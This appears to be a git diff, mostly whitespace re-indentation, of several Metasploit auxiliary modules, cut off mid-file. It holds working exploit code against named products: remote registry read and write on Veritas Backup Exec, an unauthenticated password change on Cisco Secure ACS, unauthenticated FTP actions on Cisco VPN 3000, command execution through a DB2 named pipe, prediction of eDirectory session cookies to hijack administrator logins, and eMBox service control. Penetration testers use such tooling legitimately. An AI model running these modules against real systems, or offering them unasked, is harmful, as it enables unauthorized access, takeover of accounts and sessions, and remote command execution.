- NDR.long(4096) +
- NDR.long(0) +
- NDR.long(4) +
- NDR.long(4) +
- NDR.long(hive)
- return stub
- end
-
- # RPC Service 5
- def backupexec_regrpc_write(opts = {})
- subkey = opts[:subkey] || ''
- subval = opts[:subval] || ''
- hive = opts[:hive] || HKEY_LOCAL_MACHINE
- type = opts[:type] || REG_SZ
- data = opts[:data] || ''
-
- if (type == REG_SZ || type == REG_EXPAND_SZ)
- data = Rex::Text.to_unicode(data+"\x00")
- end
-
- stub =
- NDR.UnicodeConformantVaryingString(subkey) +
- NDR.UnicodeConformantVaryingString(subval) +
- NDR.long(type) +
- NDR.long(data.length) +
- NDR.long(data.length) +
- data +
- NDR.align(data) +
- NDR.long(4) +
- NDR.long(4) +
- NDR.long(hive)
- return stub
- end
+ include Msf::Exploit::Remote::DCERPC
+ include ::Rex::Platforms::Windows
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Veritas Backup Exec Server Registry Access',
+ 'Description' => %q{
+ This modules exploits a remote registry access flaw in the BackupExec Windows
+ Server RPC service. This vulnerability was discovered by Pedram Amini and is based
+ on the NDR stub information information posted to openrce.org.
+ Please see the action list for the different attack modes.
+
+ },
+ 'Author' => [ 'hdm' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'OSVDB', '17627' ],
+ [ 'CVE', '2005-0771' ],
+ [ 'URL', 'http://www.idefense.com/application/poi/display?id=269&type=vulnerabilities'],
+ ],
+ 'Actions' =>
+ [
+ ['System Information'],
+ ['Create Logon Notice']
+ ],
+ 'DefaultAction' => 'System Information'
+ ))
+
+ register_options(
+ [
+ Opt::RPORT(6106),
+ OptString.new('WARN',
+ [
+ false,
+ "The warning to display for the Logon Notice action",
+ "Compromised by Metasploit!\r\n"
+ ]
+ ),
+ ], self.class)
+ end
+
+ def auxiliary_commands
+ return {
+ "regread" => "Read a registry value",
+ # "regenum" => "Enumerate registry keys",
+ }
+ end
+
+ def run
+ case action.name
+ when 'System Information'
+ system_info()
+ when 'Create Logon Notice'
+ logon_notice()
+ end
+ end
+
+
+ def cmd_regread(*args)
+
+ if (args.length == 0)
+ print_status("Usage: regread HKLM\\\\Hardware\\\\Description\\\\System\\\\SystemBIOSVersion")
+ return
+ end
+
+ paths = args[0].split("\\")
+ hive = paths.shift
+ subval = paths.pop
+ subkey = paths.join("\\")
+ data = backupexec_regread(hive, subkey, subval)
+
+ if (data)
+ print_status("DATA: #{deunicode(data)}")
+ else
+ print_error("Failed to read #{hive}\\#{subkey}\\#{subval}...")
+ end
+
+ end
+
+ def cmd_regenum(*args)
+
+ if (args.length == 0)
+ print_status("Usage: regenum HKLM\\\\Software")
+ return
+ end
+
+ paths = args[0].split("\\")
+ hive = paths.shift
+ subkey = "\\" + paths.join("\\")
+ data = backupexec_regenum(hive, subkey)
+
+ if (data)
+ print_status("DATA: #{deunicode(data)}")
+ else
+ print_error("Failed to enumerate #{hive}\\#{subkey}...")
+ end
+
+ end
+
+ def system_info
+ print_status("Dumping system information...")
+
+ prod_id = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows\\CurrentVersion', 'ProductId') || 'Unknown'
+ prod_name = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName') || 'Windows (Unknown)'
+ prod_sp = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'CSDVersion') || 'No Service Pack'
+ owner = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOwner') || 'Unknown Owner'
+ company = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOrganization') || 'Unknown Company'
+ cpu = backupexec_regread('HKLM', 'Hardware\\Description\\System\\CentralProcessor\\0', 'ProcessorNameString') || 'Unknown CPU'
+ username = backupexec_regread('HKCU', 'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer', 'Logon User Name') || 'SYSTEM'
+
+ print_status("The current interactive user is #{deunicode(username)}")
+ print_status("The operating system is #{deunicode(prod_name)} #{deunicode(prod_sp)} (#{deunicode(prod_id)})")
+ print_status("The system is registered to #{deunicode(owner)} of #{deunicode(company)}")
+ print_status("The system runs on a #{deunicode(cpu)}")
+ end
+
+ def logon_notice
+ print_status("Setting the logon warning to #{datastore['WARN'].strip}...")
+ backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeText', REG_SZ, datastore['WARN'])
+ backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeCaption', REG_SZ, 'METASPLOIT')
+ end
+
+
+ def deunicode(str)
+ str.gsub(/\x00/, '').strip
+ end
+
+ #
+ # Write a registry key
+ #
+ def backupexec_regwrite(hive, subkey, subval, type, data)
+ stub = backupexec_regrpc_write(
+ :hive => registry_hive_lookup(hive),
+ :subkey => subkey,
+ :subval => subval,
+ :type => type,
+ :data => data
+ )
+ resp = backupexec_regrpc_call(5, stub)
+ return false if resp.length == 0
+ return true
+ end
+
+ #
+ # Read a registry key
+ #
+ def backupexec_regread(hive, subkey, subval, type = REG_SZ)
+ stub = backupexec_regrpc_read(
+ :hive => registry_hive_lookup(hive),
+ :subkey => subkey,
+ :subval => subval,
+ :type => type
+ )
+ resp = backupexec_regrpc_call(4, stub)
+
+ return nil if resp.length == 0
+ ret, len = resp[0,8].unpack('VV')
+ return nil if ret == 0
+ return nil if len == 0
+ return resp[8, len]
+ end
+
+ #
+ # Enumerate a registry key
+ #
+ def backupexec_regenum(hive, subkey)
+ stub = backupexec_regrpc_enum(
+ :hive => registry_hive_lookup(hive),
+ :subkey => subkey
+ )
+ resp = backupexec_regrpc_call(7, stub)
+ p resp
+
+ return nil if resp.length == 0
+ ret, len = resp[0,8].unpack('VV')
+ return nil if ret == 0
+ return nil if len == 0
+ return resp[8, len]
+ end
+
+ #
+ # Call the backupexec registry service
+ #
+ def backupexec_regrpc_call(opnum, data = '')
+
+ handle = dcerpc_handle(
+ '93841fd0-16ce-11ce-850d-02608c44967b', '1.0',
+ 'ncacn_ip_tcp', [datastore['RPORT']]
+ )
+
+ dcerpc_bind(handle)
+
+ resp = dcerpc.call(opnum, data)
+ outp = ''
+
+ if (dcerpc.last_response and dcerpc.last_response.stub_data)
+ outp = dcerpc.last_response.stub_data
+ end
+
+ disconnect
+
+ outp
+ end
+
+ # RPC Service 4
+ def backupexec_regrpc_read(opts = {})
+ subkey = opts[:subkey] || ''
+ subval = opts[:subval] || ''
+ hive = opts[:hive] || HKEY_LOCAL_MACHINE
+ type = opts[:type] || REG_SZ
+
+ stub =
+ NDR.UnicodeConformantVaryingString(subkey) +
+ NDR.UnicodeConformantVaryingString(subval) +
+ NDR.long(type) +
+ NDR.long(1024) +
+ NDR.long(0) +
+ NDR.long(4) +
+ NDR.long(4) +
+ NDR.long(hive)
+ return stub
+ end
+
+ # RPC Service 7
+ def backupexec_regrpc_enum(opts = {})
+ subkey = opts[:subkey] || ''
+ hive = opts[:hive] || HKEY_LOCAL_MACHINE
+ stub =
+ NDR.UnicodeConformantVaryingString(subkey) +
+ NDR.long(4096) +
+ NDR.long(0) +
+ NDR.long(4) +
+ NDR.long(4) +
+ NDR.long(hive)
+ return stub
+ end
+
+ # RPC Service 5
+ def backupexec_regrpc_write(opts = {})
+ subkey = opts[:subkey] || ''
+ subval = opts[:subval] || ''
+ hive = opts[:hive] || HKEY_LOCAL_MACHINE
+ type = opts[:type] || REG_SZ
+ data = opts[:data] || ''
+
+ if (type == REG_SZ || type == REG_EXPAND_SZ)
+ data = Rex::Text.to_unicode(data+"\x00")
+ end
+
+ stub =
+ NDR.UnicodeConformantVaryingString(subkey) +
+ NDR.UnicodeConformantVaryingString(subval) +
+ NDR.long(type) +
+ NDR.long(data.length) +
+ NDR.long(data.length) +
+ data +
+ NDR.align(data) +
+ NDR.long(4) +
+ NDR.long(4) +
+ NDR.long(hive)
+ return stub
+ end
end
View
186 modules/auxiliary/admin/cisco/cisco_secure_acs_bypass.rb
@@ -9,108 +9,108 @@
class Metasploit4 < Msf::Auxiliary
- include Msf::Exploit::Remote::HttpClient
- include Msf::Auxiliary::Report
- include Msf::Auxiliary::Scanner
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Cisco Secure ACS Version < 5.1.0.44.5 or 5.2.0.26.2 Unauthorized Password Change',
- 'Description' => %q{
- This module exploits an authentication bypass issue which allows arbitrary
- password change requests to be issued for any user in the local store.
- Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well
- as version 5.2 with either no patches or patches 1 and 2 are vulnerable.
- },
- 'References' =>
- [
- ['BID', '47093'],
- ['CVE', '2011-0951'],
- ['URL', 'http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html']
- ],
- 'Author' =>
- [
- 'Jason Kratzer <pyoor[at]flinkd.org>'
- ],
- 'License' => MSF_LICENSE
- ))
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Cisco Secure ACS Version < 5.1.0.44.5 or 5.2.0.26.2 Unauthorized Password Change',
+ 'Description' => %q{
+ This module exploits an authentication bypass issue which allows arbitrary
+ password change requests to be issued for any user in the local store.
+ Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well
+ as version 5.2 with either no patches or patches 1 and 2 are vulnerable.
+ },
+ 'References' =>
+ [
+ ['BID', '47093'],
+ ['CVE', '2011-0951'],
+ ['URL', 'http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html']
+ ],
+ 'Author' =>
+ [
+ 'Jason Kratzer <pyoor[at]flinkd.org>'
+ ],
+ 'License' => MSF_LICENSE
+ ))
- register_options(
- [
- Opt::RPORT(443),
- OptString.new('TARGETURI', [true, 'Path to UCP WebService', '/PI/services/UCP/']),
- OptString.new('USERNAME', [true, 'Username to use', '']),
- OptString.new('PASSWORD', [true, 'Password to use', '']),
- OptBool.new('SSL', [true, 'Use SSL', true])
- ], self.class)
- end
+ register_options(
+ [
+ Opt::RPORT(443),
+ OptString.new('TARGETURI', [true, 'Path to UCP WebService', '/PI/services/UCP/']),
+ OptString.new('USERNAME', [true, 'Username to use', '']),
+ OptString.new('PASSWORD', [true, 'Password to use', '']),
+ OptBool.new('SSL', [true, 'Use SSL', true])
+ ], self.class)
+ end
- def rport
- datastore['RPORT']
- end
+ def rport
+ datastore['RPORT']
+ end
- def run_host(ip)
- soapenv='http://schemas.xmlsoap.org/soap/envelope/'
- soapenvenc='http://schemas.xmlsoap.org/soap/encoding/'
- xsi='http://www.w3.org/1999/XMLSchema-instance'
- xsd='http://www.w3.org/1999/XMLSchema'
- ns1='ns1:changeUserPass'
+ def run_host(ip)
+ soapenv='http://schemas.xmlsoap.org/soap/envelope/'
+ soapenvenc='http://schemas.xmlsoap.org/soap/encoding/'
+ xsi='http://www.w3.org/1999/XMLSchema-instance'
+ xsd='http://www.w3.org/1999/XMLSchema'
+ ns1='ns1:changeUserPass'
- data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
- data << '<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="' + soapenvenc + '" '
- data << 'xmlns:SOAP-ENC="' + soapenvenc + '" '
- data << 'xmlns:xsi="' + xsi + '" xmlns:SOAP-ENV="' + soapenv + '" '
- data << 'xmlns:xsd="' + xsd + '">' + "\r\n"
+ data = '<?xml version="1.0" encoding="utf-8"?>' + "\r\n"
+ data << '<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="' + soapenvenc + '" '
+ data << 'xmlns:SOAP-ENC="' + soapenvenc + '" '
+ data << 'xmlns:xsi="' + xsi + '" xmlns:SOAP-ENV="' + soapenv + '" '
+ data << 'xmlns:xsd="' + xsd + '">' + "\r\n"
- data << '<SOAP-ENV:Body>' + "\r\n"
- data << '<ns1:changeUserPass xmlns:ns1="UCP" SOAP-ENC:root="1">' + "\r\n"
- data << '<v1 xsi:type="xsd:string">' + datastore['USERNAME'] + '</v1>' + "\r\n"
- data << '<v2 xsi:type="xsd:string">fakepassword</v2>' + "\r\n"
- data << '<v3 xsi:type="xsd:string">' + datastore['PASSWORD'] + '</v3>' + "\r\n"
- data << '</ns1:changeUserPass>'
- data << '</SOAP-ENV:Body>' + "\r\n"
- data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"
+ data << '<SOAP-ENV:Body>' + "\r\n"
+ data << '<ns1:changeUserPass xmlns:ns1="UCP" SOAP-ENC:root="1">' + "\r\n"
+ data << '<v1 xsi:type="xsd:string">' + datastore['USERNAME'] + '</v1>' + "\r\n"
+ data << '<v2 xsi:type="xsd:string">fakepassword</v2>' + "\r\n"
+ data << '<v3 xsi:type="xsd:string">' + datastore['PASSWORD'] + '</v3>' + "\r\n"
+ data << '</ns1:changeUserPass>'
+ data << '</SOAP-ENV:Body>' + "\r\n"
+ data << '</SOAP-ENV:Envelope>' + "\r\n\r\n"
- print_status("Issuing password change request for: " + datastore['USERNAME'])
+ print_status("Issuing password change request for: " + datastore['USERNAME'])
- begin
- uri = normalize_uri(target_uri.path)
- uri << '/' if uri[-1,1] != '/'
- res = send_request_cgi({
- 'uri' => uri,
- 'method' => 'POST',
- 'data' => data,
- 'headers' =>
- {
- 'SOAPAction' => '"changeUserPass"',
- }
- }, 60)
+ begin
+ uri = normalize_uri(target_uri.path)
+ uri << '/' if uri[-1,1] != '/'
+ res = send_request_cgi({
+ 'uri' => uri,
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' =>
+ {
+ 'SOAPAction' => '"changeUserPass"',
+ }
+ }, 60)
- rescue ::Rex::ConnectionError
- print_error("#{rhost}:#{rport} [ACS] Unable to communicate")
- return :abort
- end
+ rescue ::Rex::ConnectionError
+ print_error("#{rhost}:#{rport} [ACS] Unable to communicate")
+ return :abort
+ end
- if not res
- print_error("#{rhost}:#{rport} [ACS] Unable to connect")
- return
- elsif res.code == 200
- body = res.body
- if body.match(/success/i)
- print_good("#{rhost} - Success! Password has been changed.")
- elsif body.match(/Password has already been used/)
- print_error("#{rhost} - Failed! The supplied password has already been used.")
- print_error("Please change the password and try again.")
- elsif body.match(/Invalid credntials for user/)
- print_error("#{rhost} - Failed! Either the username does not exist or target is not vulnerable.")
- print_error("Please change the username and try again.")
- else
- print_error("#{rhost} - Failed! An unknown error has occurred.")
- end
- else
- print_error("#{rhost} - Failed! The webserver issued a #{res.code} response.")
- print_error("Please validate the TARGETURI option and try again.")
- end
+ if not res
+ print_error("#{rhost}:#{rport} [ACS] Unable to connect")
+ return
+ elsif res.code == 200
+ body = res.body
+ if body.match(/success/i)
+ print_good("#{rhost} - Success! Password has been changed.")
+ elsif body.match(/Password has already been used/)
+ print_error("#{rhost} - Failed! The supplied password has already been used.")
+ print_error("Please change the password and try again.")
+ elsif body.match(/Invalid credntials for user/)
+ print_error("#{rhost} - Failed! Either the username does not exist or target is not vulnerable.")
+ print_error("Please change the username and try again.")
+ else
+ print_error("#{rhost} - Failed! An unknown error has occurred.")
+ end
+ else
+ print_error("#{rhost} - Failed! The webserver issued a #{res.code} response.")
+ print_error("Please validate the TARGETURI option and try again.")
+ end
- end
+ end
end
View
120 modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb
@@ -11,70 +11,70 @@
class Metasploit3 < Msf::Auxiliary
- include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::Tcp
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access',
- 'Description' => %q{
- This module tests for a logic vulnerability in the Cisco VPN Concentrator
- 3000 series. It is possible to execute some FTP statements without authentication
- (CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs
- when working with CWD commands. This module simply creates an arbitrary directory,
- verifies that the directory has been created, then deletes it and verifies deletion
- to confirm the bug.
- },
- 'Author' => [ 'patrick' ],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- [ 'BID', '19680' ],
- [ 'CVE', '2006-4313' ],
- [ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20060823-vpn3k.shtml' ],
- [ 'OSVDB', '28139' ],
- [ 'OSVDB', '28138' ],
- ],
- 'DisclosureDate' => 'Aug 23 2006'))
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access',
+ 'Description' => %q{
+ This module tests for a logic vulnerability in the Cisco VPN Concentrator
+ 3000 series. It is possible to execute some FTP statements without authentication
+ (CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs
+ when working with CWD commands. This module simply creates an arbitrary directory,
+ verifies that the directory has been created, then deletes it and verifies deletion
+ to confirm the bug.
+ },
+ 'Author' => [ 'patrick' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'BID', '19680' ],
+ [ 'CVE', '2006-4313' ],
+ [ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20060823-vpn3k.shtml' ],
+ [ 'OSVDB', '28139' ],
+ [ 'OSVDB', '28138' ],
+ ],
+ 'DisclosureDate' => 'Aug 23 2006'))
- register_options(
- [
- Opt::RPORT(21),
- ], self.class)
- end
+ register_options(
+ [
+ Opt::RPORT(21),
+ ], self.class)
+ end
- def run
- connect
- res = sock.get_once
- if (res and res =~ /220 Session will be terminated after/)
- print_status("Target appears to be a Cisco VPN Concentrator 3000 series.")
+ def run
+ connect
+ res = sock.get_once
+ if (res and res =~ /220 Session will be terminated after/)
+ print_status("Target appears to be a Cisco VPN Concentrator 3000 series.")
- test = Rex::Text.rand_text_alphanumeric(8)
+ test = Rex::Text.rand_text_alphanumeric(8)
- print_status("Attempting to create directory: MKD #{test}")
- sock.put("MKD #{test}\r\n")
- res = sock.get(-1,5)
+ print_status("Attempting to create directory: MKD #{test}")
+ sock.put("MKD #{test}\r\n")
+ res = sock.get(-1,5)
- if (res =~/257 MKD command successful\./)
- print_status("\tDirectory #{test} reportedly created. Verifying with SIZE #{test}")
- sock.put("SIZE #{test}\r\n")
- res = sock.get(-1,5)
- if (res =~ /550 Not a regular file/)
- print_status("\tServer reports \"not a regular file\". Directory verified.")
- print_status("\tAttempting to delete directory: RMD #{test}")
- sock.put("RMD #{test}\r\n")
- res = sock.get(-1,5)
- if (res =~ /250 RMD command successful\./)
- print_status("\tDirectory #{test} reportedly deleted. Verifying with SIZE #{test}")
- sock.put("SIZE #{test}\r\n")
- res = sock.get(-1,5)
- print_status("\tDirectory #{test} no longer exists!")
- print_status("Target is confirmed as vulnerable!")
- end
- end
- end
- else
- print_status("Target is either not Cisco or the target has been patched.")
- end
- disconnect
- end
+ if (res =~/257 MKD command successful\./)
+ print_status("\tDirectory #{test} reportedly created. Verifying with SIZE #{test}")
+ sock.put("SIZE #{test}\r\n")
+ res = sock.get(-1,5)
+ if (res =~ /550 Not a regular file/)
+ print_status("\tServer reports \"not a regular file\". Directory verified.")
+ print_status("\tAttempting to delete directory: RMD #{test}")
+ sock.put("RMD #{test}\r\n")
+ res = sock.get(-1,5)
+ if (res =~ /250 RMD command successful\./)
+ print_status("\tDirectory #{test} reportedly deleted. Verifying with SIZE #{test}")
+ sock.put("SIZE #{test}\r\n")
+ res = sock.get(-1,5)
+ print_status("\tDirectory #{test} no longer exists!")
+ print_status("Target is confirmed as vulnerable!")
+ end
+ end
+ end
+ else
+ print_status("Target is either not Cisco or the target has been patched.")
+ end
+ disconnect
+ end
end
View
160 modules/auxiliary/admin/db2/db2rcmd.rb
@@ -9,84 +9,84 @@
class Metasploit3 < Msf::Auxiliary
- include Msf::Exploit::Remote::SMB
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'IBM DB2 db2rcmd.exe Command Execution Vulnerability',
- 'Description' => %q{
- This module exploits a vulnerability in the Remote Command Server
- component in IBM's DB2 Universal Database 8.1. An authenticated
- attacker can send arbitrary commands to the DB2REMOTECMD named pipe
- which could lead to administrator privileges.
- },
- 'Author' => [ 'MC' ],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- [ 'CVE', '2004-0795' ],
- [ 'OSVDB', '4180' ],
- [ 'BID', '9821' ],
- ],
- 'DisclosureDate' => 'Mar 4 2004'))
-
- register_options(
- [
- OptString.new('CMD', [ true, 'The command to execute', 'ver']),
- OptString.new('SMBUser', [ true, 'The username to authenticate as', 'db2admin']),
- OptString.new('SMBPass', [ true, 'The password for the specified username', 'db2admin'])
- ], self.class )
- end
-
- def run
-
- print_status("Connecting to the server...")
- connect()
-
- print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
-
- # Connect with a valid user/pass. if not, then bail.
- begin
- smb_login()
- rescue ::Exception => e
- print_error("Error: #{e}")
- disconnect
- return
- end
-
- # Have it so our command arg is convenient to call.
- rcmd = datastore['CMD']
-
- print_status("Connecting to named pipe \\DB2REMOTECMD...")
-
- # If the pipe doesn't exist, bail.
- begin
- pipe = simple.create_pipe('\\DB2REMOTECMD')
- rescue ::Exception => e
- print_error("Error: #{e}")
- disconnect
- return
- end
-
- # If we get this far, do the dance.
-
- fid = pipe.file_id
-
- # Need to make a Trans2 request with the param of 'QUERY_FILE_INFO' keeping our file_id
- trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
-
- # Write to the pipe, our command length comes into play.
- pipe.write([0x00000001].pack('V') + "DB2" + "\x00" * 525 + [rcmd.length].pack('V'))
- # Send off our command
- pipe.write(rcmd)
-
- # Read from the pipe and give us the data.
- res = pipe.read()
- print_line(res)
-
- # Close the named pipe and disconnect from the socket.
- pipe.close
- disconnect
-
- end
+ include Msf::Exploit::Remote::SMB
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'IBM DB2 db2rcmd.exe Command Execution Vulnerability',
+ 'Description' => %q{
+ This module exploits a vulnerability in the Remote Command Server
+ component in IBM's DB2 Universal Database 8.1. An authenticated
+ attacker can send arbitrary commands to the DB2REMOTECMD named pipe
+ which could lead to administrator privileges.
+ },
+ 'Author' => [ 'MC' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2004-0795' ],
+ [ 'OSVDB', '4180' ],
+ [ 'BID', '9821' ],
+ ],
+ 'DisclosureDate' => 'Mar 4 2004'))
+
+ register_options(
+ [
+ OptString.new('CMD', [ true, 'The command to execute', 'ver']),
+ OptString.new('SMBUser', [ true, 'The username to authenticate as', 'db2admin']),
+ OptString.new('SMBPass', [ true, 'The password for the specified username', 'db2admin'])
+ ], self.class )
+ end
+
+ def run
+
+ print_status("Connecting to the server...")
+ connect()
+
+ print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...")
+
+ # Connect with a valid user/pass. if not, then bail.
+ begin
+ smb_login()
+ rescue ::Exception => e
+ print_error("Error: #{e}")
+ disconnect
+ return
+ end
+
+ # Have it so our command arg is convenient to call.
+ rcmd = datastore['CMD']
+
+ print_status("Connecting to named pipe \\DB2REMOTECMD...")
+
+ # If the pipe doesn't exist, bail.
+ begin
+ pipe = simple.create_pipe('\\DB2REMOTECMD')
+ rescue ::Exception => e
+ print_error("Error: #{e}")
+ disconnect
+ return
+ end
+
+ # If we get this far, do the dance.
+
+ fid = pipe.file_id
+
+ # Need to make a Trans2 request with the param of 'QUERY_FILE_INFO' keeping our file_id
+ trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '')
+
+ # Write to the pipe, our command length comes into play.
+ pipe.write([0x00000001].pack('V') + "DB2" + "\x00" * 525 + [rcmd.length].pack('V'))
+ # Send off our command
+ pipe.write(rcmd)
+
+ # Read from the pipe and give us the data.
+ res = pipe.read()
+ print_line(res)
+
+ # Close the named pipe and disconnect from the socket.
+ pipe.close
+ disconnect
+
+ end
end
View
122 modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb
@@ -11,74 +11,74 @@
class Metasploit3 < Msf::Auxiliary
- include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::Tcp
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Novell eDirectory DHOST Predictable Session Cookie',
- 'Description' => %q{
- This module is able to predict the next session cookie value issued
- by the DHOST web service of Novell eDirectory 8.8.5. An attacker can run
- this module, wait until the real administrator logs in, then specify the
- predicted cookie value to hijack their session.
- },
- 'References' =>
- [
- ['OSVDB', '60035'],
- ],
- 'Author' => 'hdm',
- 'License' => MSF_LICENSE
- ))
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Novell eDirectory DHOST Predictable Session Cookie',
+ 'Description' => %q{
+ This module is able to predict the next session cookie value issued
+ by the DHOST web service of Novell eDirectory 8.8.5. An attacker can run
+ this module, wait until the real administrator logs in, then specify the
+ predicted cookie value to hijack their session.
+ },
+ 'References' =>
+ [
+ ['OSVDB', '60035'],
+ ],
+ 'Author' => 'hdm',
+ 'License' => MSF_LICENSE
+ ))
- register_options([
- Opt::RPORT(8030),
- OptBool.new('SSL', [true, 'Use SSL', true])
- ], self.class)
- end
+ register_options([
+ Opt::RPORT(8030),
+ OptBool.new('SSL', [true, 'Use SSL', true])
+ ], self.class)
+ end
- def run
- vals = []
- name = ""
+ def run
+ vals = []
+ name = ""
- print_status("Making 5 requests to verify predictions...")
- 1.upto(6) do
+ print_status("Making 5 requests to verify predictions...")
+ 1.upto(6) do
- connect
- req = "GET /dhost/ HTTP/1.1\r\n"
- req << "Host: #{rhost}:#{rport}\r\n"
- req << "Connection: close\r\n\r\n"
- sock.put(req)
- res = sock.get_once(-1,5)
- disconnect
+ connect
+ req = "GET /dhost/ HTTP/1.1\r\n"
+ req << "Host: #{rhost}:#{rport}\r\n"
+ req << "Connection: close\r\n\r\n"
+ sock.put(req)
+ res = sock.get_once(-1,5)
+ disconnect
- cookie = nil
- if(res and res =~ /Cookie:\s*([^\s]+)\s*/mi)
- cookie = $1
- cookie,junk = cookie.split(';')
- name,cookie = cookie.split('=')
- cookie = cookie.to_i(16)
- vals << cookie
- end
- end
+ cookie = nil
+ if(res and res =~ /Cookie:\s*([^\s]+)\s*/mi)
+ cookie = $1
+ cookie,junk = cookie.split(';')
+ name,cookie = cookie.split('=')
+ cookie = cookie.to_i(16)
+ vals << cookie
+ end
+ end
- deltas = []
- prev_val = nil
- vals.each_index do |i|
- if(i > 0)
- delta = vals[i] - prev_val
- print_status("Cookie: #{i} #{"%.8x" % vals[i]} DELTA #{"%.8x" % delta}")
- deltas << delta
- end
- prev_val = vals[i]
- end
+ deltas = []
+ prev_val = nil
+ vals.each_index do |i|
+ if(i > 0)
+ delta = vals[i] - prev_val
+ print_status("Cookie: #{i} #{"%.8x" % vals[i]} DELTA #{"%.8x" % delta}")
+ deltas << delta
+ end
+ prev_val = vals[i]
+ end
- deltas.uniq!
- if(deltas.length < 4)
- print_status("The next cookie value will be: #{name}=#{"%.8x" % (prev_val + deltas[0])}")
- else
- print_status("The cookie value is less predictable, maybe this has been patched?")
- print_status("Deltas: #{deltas.map{|x| "%.8x" % x}.join(", ")}")
- end
- end
+ deltas.uniq!
+ if(deltas.length < 4)
+ print_status("The next cookie value will be: #{name}=#{"%.8x" % (prev_val + deltas[0])}")
+ else
+ print_status("The cookie value is less predictable, maybe this has been patched?")
+ print_status("Deltas: #{deltas.map{|x| "%.8x" % x}.join(", ")}")
+ end
+ end
end
View
278 modules/auxiliary/admin/edirectory/edirectory_edirutil.rb
@@ -9,153 +9,153 @@
class Metasploit3 < Msf::Auxiliary
- include Msf::Exploit::Remote::Tcp
- include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Remote::HttpClient
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'Novell eDirectory eMBox Unauthenticated File Access',
- 'Description' => %q{
- This module will access Novell eDirectory's eMBox service and can run the
- following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,
- STOP_SERVICE, START_SERVICE, SET_LOGFILE.
- },
- 'References' =>
- [
- [ 'CVE', '2008-0926' ],
- [ 'BID', '28441' ],
- [ 'OSVDB', '43690' ]
- ],
- 'Author' =>
- [
- 'Nicob',
- 'MC', #Initial Metasploit module
- 'sinn3r'
- ],
- 'License' => MSF_LICENSE,
- 'Actions' =>
- [
- [
- 'GET_DN',
- {
- 'Description' => 'Get DN',
- 'CMD' => 'novell.embox.connmgr.serverinfo',
- 'PATTERN' => /<ServerDN dt="Binary">(.*)<\/ServerDN>/,
- 'USE_PARAM' => false
- }
- ],
- [
- 'READ_LOGS',
- {
- 'Description' => 'Read all the log files',
- 'CMD' => 'logger.readlog',
- 'PATTERN' => /<LogFileData>(.*)<\/LogFileData>/,
- 'USE_PARAM' => false
- }
- ],
- [
- 'LIST_SERVICES',
- {
- 'Description' => 'List services',
- 'CMD' => 'novell.embox.service.getServiceList',
- 'PATTERN' => /<DSService:Message dt=\"Binary\">(.*)<\/DSService:Message>/,
- 'USE_PARAM' => false
- }
- ],
- [
- 'STOP_SERVICE',
- {
- 'Description' => 'Stop a service',
- 'CMD' => 'novell.embox.service.stopService',
- 'PATTERN' => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,
- 'PARAM' => '<Parameters><params xmlns:DSService="service.dtd">'+
- '<DSService:moduleName>__PARAM__</DSService:moduleName>'+
- '</params></Parameters>',
- 'USE_PARAM' => true
- }
- ],
- [
- 'START_SERVICE',
- {
- 'Description' => 'Start a service',
- 'CMD' => 'novell.embox.service.startService',
- 'PATTERN' => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,
- 'PARAM' => '<Parameters>' +
- '<params xmlns:DSService="service.dtd">' +
